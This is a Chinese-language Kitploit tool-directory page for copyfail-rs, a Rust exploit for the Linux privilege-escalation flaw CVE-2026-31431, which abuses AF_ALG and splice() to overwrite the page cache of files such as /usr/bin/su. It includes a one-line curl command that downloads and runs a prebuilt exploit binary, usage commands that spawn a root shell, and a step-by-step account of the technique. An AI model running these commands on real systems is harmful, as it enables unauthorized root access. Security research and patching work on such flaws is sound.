Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/sammwyy/copyfail-rs
权限提升漏洞利用框架漏洞分析漏洞利用Payload 开发二进制利用
GitHubsammwyy/copyfail-rs

copyfail-rs

复制失败漏洞利用(CVE-2026-31431),但用 Rust 实现。

查看仓库
1423个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

copyfail-rs

Copy Fail 漏洞利用(CVE-2026-31431)的 Rust 实现,这是一个关键漏洞,通过链式利用 AF_ALG 和 splice() 实现 4 字节页缓存写入,从而在主流 Linux 发行版上实现本地权限提升。

基于 Xint Code 的研究和 PoC。

免责声明

[!CAUTION] 本项目仅用于教育和研究目的。在您不拥有或未经明确许可的系统上运行此漏洞利用程序是非法且不道德的。请负责任地使用此代码,以理解和防御类似的漏洞。

特性

  • 纯 Rust 实现:高性能、内存安全的原始 Python PoC 实现。
  • 动态 ELF 构建器:在运行时以编程方式构造漏洞利用载荷,支持自定义命令。
  • 零拷贝利用:通过 libc 直接与 Linux 内核的 AF_ALG 和 splice() 系统调用交互。
  • 可定制:通过命令行参数指定要以 root 权限运行的命令。

快速开始(一行命令)

您可以直接下载并运行预编译的 PoC 二进制文件:

root@kitploit:~
curl -L https://github.com/sammwyy/copyfail-rs/releases/download/poc/copyfail-rs_x86-64 -o copyfail-rs && chmod +x copyfail-rs && ./copyfail-rs

前提条件

  • 一个易受 CVE-2026-31431 影响的 Linux 内核(通常是 2026 年 4 月补丁之前的内核)。
  • 可访问具有读取权限的目标二进制文件(默认为 /usr/bin/su)。

安装

克隆仓库并构建二进制文件:

root@kitploit:~
git clone https://github.com/sammwyy/copyfail-rs.git
cd copyfail-rs
cargo build --release

使用方法

不带参数运行漏洞利用程序,默认执行 /bin/sh:

root@kitploit:~
./target/release/copyfail-rs

或指定要以 root 权限运行的自定义命令:

root@kitploit:~
./target/release/copyfail-rs "whoami > /tmp/pwned"

工作原理

该漏洞利用利用了 Linux 内核 Crypto API(AF_ALG)中 authencesn 实现的一个缺陷。通过将 sendmsg 与 MSG_MORE 和 splice() 链式结合,可以用恶意 ELF 载荷覆盖任意文件(如 /usr/bin/su)的页缓存中的小块数据。

  1. 套接字设置:创建 AF_ALG 套接字并绑定到 authencesn(hmac(sha256),cbc(aes))。
  2. 载荷生成:在内存中构造一个最小的 ELF,用于以 root 权限执行目标命令。
  3. 缓存注入:利用 AF_ALG 漏洞,迭代地将载荷拼接(splice)到目标文件的页缓存中。
  4. 触发:执行修改后的目标文件,运行注入的 shellcode。

参考

  • 原始博客文章 - Xint Code
  • CVE-2026-31431 详情
下载工具